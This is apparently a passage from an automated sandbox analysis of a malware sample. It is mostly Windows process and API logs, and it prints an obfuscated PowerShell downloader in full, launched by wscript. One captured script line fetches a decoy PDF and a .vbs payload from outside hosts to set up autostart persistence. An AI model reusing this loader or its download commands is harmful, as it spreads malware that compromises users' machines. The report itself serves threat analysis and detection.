lddeiM.tte ';$Deaktiverende=gaardspladsens 'panor> atol ';$Emanciperingerne=gaardspladsens 'Bru.hiBlideeRut,exFyl e ';$Almengjordes='Loftrum243';$Cometlike = gaardspladsens ' H lvequ,drcRespohsura,oSniff Teser%Subcha Klunpkun.tptaagedFlotaaCr.sst TvanaCox c%D.mss\AurunS nforuSkrmscSv jncAiz,eeGreensAnthof FjeruDisjolVeksedLitogeBlod.. Sub,bCentrlTeksto olle Lati&Ultra&Tamar SandieOphthct ndah C.gaoAfplu FamiltSlidb ';sanktionjtr (gaardspladsens 'Isos.$ImpregArri.lTombaoRossabGast aSo,thlPrede:.eserUHanged DisksautoomSbeopeKontolWretctIncrenBerigiMenzinO,eirgDed gePurifn Ho o=W ter( Gam,cReto.m excadEloin Unch/ Ami cAllit Rekvi$OboleC StavoSuppemSevereUnmantThromlOghamiCes,ok RekoeJump to behavior
          Suspicious powershell command line found
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter';If (${host}.CurrentCulture) {$Bellisserne++;}Function gaardspladsens($Agerendes){$Dafter135=$Agerendes.Length-$Bellisserne;$Unburden='SUBsTRI';$Unburden+='ng';For( $Unminimizing=5;$Unminimizing -lt $Dafter135;$Unminimizing+=6){$Anetholes+=$Agerendes.$Unburden.Invoke( $Unminimizing, $Bellisserne);}$Anetholes;}function sanktionjtr($Epigyne){ . ($Emanciperingerne) ($Epigyne);}$Forlngelsers=gaardspladsens 'Ol erMTyvekoDi.elzCoenoi Fronl Heldl.nfusaNatro/E.cam5Unbri.Avlsh0Koord Fo.b(Po.omW AcceiFravrnAmentd UnpuoRealkw ZoonsMyxom .ejsN .hudTRecor Unend1Turne0,npow.Zymoc0Dacty;Predo F,skeWantipiSeptinGu,gn6Kundg4Brn,b;Colla Overixforsy6Af ta4 Malt;Fo.ew LawserPrepov Kom,:Barnl1for e2Incom1Tom,t.te,eo0Alloc)B.ytk Vill,G Skyte Retrc kldnk MaveoChili/L.tre2Redis0Nazil1Tling0C rci0Zitta1Trkas0Nonco1 Slu SelecFM.ssaiSkyd rSi ine ampf .ostochevixDemob/trodd1und.r2Ser m1Earmu.Stra,0Exagg ';$Fangstknivens=gaardspladsens 'ImparUPremosaromaeBallar Unfr-Lect,APliengRipo,e ExcenRubritDefin ';$Unyttigst=gaardspladsens 'Afvrgh DanstAllestH.stepKommesbevi,: K.nt/Dosme/ forgwIter.wPal mwNeur..HouslaVagarlC ccymKlovnr HemawAnnelaSkjerd.ndta. SvrvcUnkinoSultampimps/,tammwparanh Skva/Sp.ckSUnin,uLo hibOrgieoStorkrSamtadOptrniTap.lnResuneCommerPaxone,hapenGowlkdPingeeRokkes,usti7Affld8Unem..,eadmsUnharmde eniV,nre>MicrohForlotSteretKniplpKonklsTillg:Lingu/Rengr/ Dimyw SusiwBreg.w,onst. Samle DomsrGgepupArgui-appelrn,rmaoOpryky Ethea AkkrlGarvk-Protoc kandrNo.atoFe tswfejlmnMesop. DecaiEmbaln irkefResteoAnh l/ CifrwChanchAttak/,adioS Alaru.ountbIndlsoParaprpian.d Scrai ThornS.ptieFin.irK ntaeChantnVegetd FingeI,glosGuden7 Bekr8abrik.,ydrosKri sm lddeiM.tte ';$Deaktiverende=gaardspladsens 'panor> atol ';$Emanciperingerne=gaardspladsens 'Bru.hiBlideeRut,exFyl e ';$Almengjordes='Loftrum243';$Cometlike = gaardspladsens ' H lvequ,drcRespohsura,oSniff Teser%Subcha Klunpkun.tptaagedFlotaaCr.sst TvanaCox c%D.mss\AurunS nforuSkrmscSv jncAiz,eeGreensAnthof FjeruDisjolVeksedLitogeBlod.. Sub,bCentrlTeksto olle Lati&Ultra&Tamar SandieOphthct ndah C.gaoAfplu FamiltSlidb ';sanktionjtr (gaardspladsens 'Isos.$ImpregArri.lTombaoRossabGast aSo,thlPrede:.eserUHanged DisksautoomSbeopeKontolWretctIncrenBerigiMenzinO,eirgDed gePurifn Ho o=W ter( Gam,cReto.m excadEloin Unch/ Ami cAllit Rekvi$OboleC StavoSuppemSevereUnmantThromlOghamiCes,ok Rekoe
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter';If (${host}.CurrentCulture) {$Bellisserne++;}Function gaardspladsens($Agerendes){$Dafter135=$Agerendes.Length-$Bellisserne;$Unburden='SUBsTRI';$Unburden+='ng';For( $Unminimizing=5;$Unminimizing -lt $Dafter135;$Unminimizing+=6){$Anetholes+=$Agerendes.$Unburden.Invoke( $Unminimizing, $Bellisserne);}$Anetholes;}function sanktionjtr($Epigyne){ . ($Emanciperingerne) ($Epigyne);}$Forlngelsers=gaardspladsens 'Ol erMTyvekoDi.elzCoenoi Fronl Heldl.nfusaNatro/E.cam5Unbri.Avlsh0Koord Fo.b(Po.omW AcceiFravrnAmentd UnpuoRealkw ZoonsMyxom .ejsN .hudTRecor Unend1Turne0,npow.Zymoc0Dacty;Predo F,skeWantipiSeptinGu,gn6Kundg4Brn,b;Colla Overixforsy6Af ta4 Malt;Fo.ew LawserPrepov Kom,:Barnl1for e2Incom1Tom,t.te,eo0Alloc)B.ytk Vill,G Skyte Retrc kldnk MaveoChili/L.tre2Redis0Nazil1Tling0C rci0Zitta1Trkas0Nonco1 Slu SelecFM.ssaiSkyd rSi ine ampf .ostochevixDemob/trodd1und.r2Ser m1Earmu.Stra,0Exagg ';$Fangstknivens=gaardspladsens 'ImparUPremosaromaeBallar Unfr-Lect,APliengRipo,e ExcenRubritDefin ';$Unyttigst=gaardspladsens 'Afvrgh DanstAllestH.stepKommesbevi,: K.nt/Dosme/ forgwIter.wPal mwNeur..HouslaVagarlC ccymKlovnr HemawAnnelaSkjerd.ndta. SvrvcUnkinoSultampimps/,tammwparanh Skva/Sp.ckSUnin,uLo hibOrgieoStorkrSamtadOptrniTap.lnResuneCommerPaxone,hapenGowlkdPingeeRokkes,usti7Affld8Unem..,eadmsUnharmde eniV,nre>MicrohForlotSteretKniplpKonklsTillg:Lingu/Rengr/ Dimyw SusiwBreg.w,onst. Samle DomsrGgepupArgui-appelrn,rmaoOpryky Ethea AkkrlGarvk-Protoc kandrNo.atoFe tswfejlmnMesop. DecaiEmbaln irkefResteoAnh l/ CifrwChanchAttak/,adioS Alaru.ountbIndlsoParaprpian.d Scrai ThornS.ptieFin.irK ntaeChantnVegetd FingeI,glosGuden7 Bekr8abrik.,ydrosKri sm lddeiM.tte ';$Deaktiverende=gaardspladsens 'panor> atol ';$Emanciperingerne=gaardspladsens 'Bru.hiBlideeRut,exFyl e ';$Almengjordes='Loftrum243';$Cometlike = gaardspladsens ' H lvequ,drcRespohsura,oSniff Teser%Subcha Klunpkun.tptaagedFlotaaCr.sst TvanaCox c%D.mss\AurunS nforuSkrmscSv jncAiz,eeGreensAnthof FjeruDisjolVeksedLitogeBlod.. Sub,bCentrlTeksto olle Lati&Ultra&Tamar SandieOphthct ndah C.gaoAfplu FamiltSlidb ';sanktionjtr (gaardspladsens 'Isos.$ImpregArri.lTombaoRossabGast aSo,thlPrede:.eserUHanged DisksautoomSbeopeKontolWretctIncrenBerigiMenzinO,eirgDed gePurifn Ho o=W ter( Gam,cReto.m excadEloin Unch/ Ami cAllit Rekvi$OboleC StavoSuppemSevereUnmantThromlOghamiCes,ok RekoeJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFE7DFD7557 pushad ; retf 1_2_00007FFE7DFD755D
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFE7DFD6D77 push esp; retf 1_2_00007FFE7DFD6D78
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFE7DFD7407 push ds; retf 1_2_00007FFE7DFD740F
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFE7DFD00BD pushad ; iretd 1_2_00007FFE7DFD00C1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFE7E0A7613 push edi; ret 1_2_00007FFE7E0A7616
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFE7DFE7D57 pushad ; ret 4_2_00007FFE7DFE7D5D
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFE7DFE7C07 push ds; ret 4_2_00007FFE7DFE7C0F
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFE7DFE00BD pushad ; iretd 4_2_00007FFE7DFE00C1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFE7DFC00BD pushad ; iretd 8_2_00007FFE7DFC00C1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFE7E095535 push ebp; iretd 8_2_00007FFE7E095538

          Boot Survival

          barindex
          Powershell creates an autostart link
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .lnk -Name));getit -fz ($fzf + 'List of Required items and services.pdf') -oulv 'htp13www.fornid.com/wh/List%20of%20rfzgquirfzgd%20itfzgms%20and%20sfzgrvicfzgs.pdf';getit -fz $flol -oulv 'htp13www.pinfzgapplfzgtfzgch.afzg/na/mg.vbs';exit@{# Script module or binary module file associated with this manifest.ModuleToProcess = 'Pester.psm1'# Version number of this module.ModuleVersion = '3.4.0'# ID used to uniquely identify this moduleGUID = 'a699dea5-2c73-4616-a270-1f7abb777e71'# Author of this moduleAuthor = 'Pester Team'# Company or vendor of this moduleCompanyName = 'Pester'# Copyright statement for this moduleCopyright = 'Copyright (c) 2016 by Pester Team, licensed under Apache 2.0 License.'# Description of the functionality provided by this moduleDescription = 'Pester provides a framework for running BDD style Tests to execute and validate PowerShell commands inside of PowerShell and offers a powerful set of Mocking Functions that allow tests to mimic and mock the functionality of any command inside of a piece of powershell code being tested. Pester tests can execute any command or script that is accesible to a pester test file. This can include functions, Cmdlets, Modules and scripts. Pester can be run in ad hoc style in a console or it can be integrated into the Build scripts of a Continuous Integration system.'# Minimum version of the Windows PowerShell engine required by this modulePowerShellVersion = '2.0'# Functions to export from this moduleFunctionsToExport = @( 'Describe', 'Context', 'It', 'Should', 'Mock', 'Assert-MockCalled', 'Assert-VerifiableMocks', 'New-Fixture', 'Get-TestDriveItem', 'Invoke-Pester', 'Setup', 'In', 'InModuleScope', 'Invoke-Mock', 'BeforeEach', 'AfterEach', 'BeforeAll', 'AfterAll' 'Get-MockDynamicParameters', 'Set-DynamicParameterVariables', 'Set-TestInconclusive', 'SafeGetCommand', 'New-PesterOption')# # Cmdlets to export from this module# CmdletsToExport = '*'# Variables to export from this moduleVariablesToExport = @( 'Path', 'TagFilter', 'ExcludeTagFilter', 'TestNameFilter', 'TestResult', 'CurrentContext', 'CurrentDescribe', 'CurrentTest', 'SessionState', 'CommandCoverage', 'BeforeEach', 'AfterEach', 'Strict')# # Aliases to export from this module# AliasesToExport = '*'# List of all modules packaged with this module# ModuleList = @()# List of all files packaged with this module# FileList = @()PrivateData = @{ # PSData is module packaging and gallery metadata embedded in PrivateData # It's for rebuilding PowerShellGet (and PoshCode) NuGet-style packages # We had to do this because it's the only place we're allowed to extend the manifest # https://connect.microsoft.com/PowerShell/feedback/details/421837 PSData = @{ # The primary categorization of this module (from the TechNet Gallery tech tree). Category = "Scripting Techniques" # Keyword tags to help users find this mod

          Hooking and other Techniques for Hiding and Protection

          barindex
          Loading BitLocker PowerShell Module
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
